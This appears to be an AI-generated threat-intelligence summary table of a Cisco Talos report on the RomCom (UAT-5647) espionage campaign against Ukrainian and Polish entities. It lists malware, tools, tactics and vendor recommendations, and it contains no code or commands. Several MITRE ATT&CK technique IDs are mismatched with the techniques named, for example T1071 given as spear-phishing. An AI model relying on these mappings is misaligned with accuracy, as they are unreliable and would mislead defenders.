| Category | Details |
|---|---|
| Threat Actors | UAT-5647 (also known as RomCom) - Russian-speaking group |
| Campaign Overview | Active since late 2023, targeting Ukrainian government and Polish entities. Focus on espionage and potential ransomware attacks. |
| Target Regions (Victims) | Ukrainian government entities and unknown Polish entities. |
| Methodology | Spear-phishing emails, malware downloaders (RustyClaw, MeltingClaw), backdoors (DustyHammock, ShadyHammock), lateral movement, tunneling into enterprise. |
| Product Targeted | Edge devices, internal network systems, and critical infrastructure of Ukrainian and Polish entities. |
| Malware Reference | RomCom malware (SingleCamper), RustClaw, MeltingClaw, DustyHammock, ShadyHammock |
| Tools Used | PuTTY’s Plink (for tunneling), Powershell (for reconnaissance), C++ and RUST-based tools, IPFS (InterPlanetary File System) |
| Vulnerabilities Exploited | Tunneling through internal ports, network reconnaissance, compromised edge devices |
| TTPs | Spear-phishing (T1071), Malware downloaders (T1070), Remote tunneling (T1572), Network discovery (T1016), Data exfiltration (T1560), System discovery (T1082) |
| Attribution | Likely Russian-speaking actors, attributed to UAT-5647 based on previous incidents |
| Recommendations | Use Cisco Secure Endpoint, Web Appliance, Email Security, Firewall, and Malware Analytics for detection. Multi-factor authentication with Cisco Duo. |
| Source | Cisco Talos Blog |
Read full article : https://blog.talosintelligence.com/uat-5647-romcom/
The above summary has been generated by an AI language model
Leave a Reply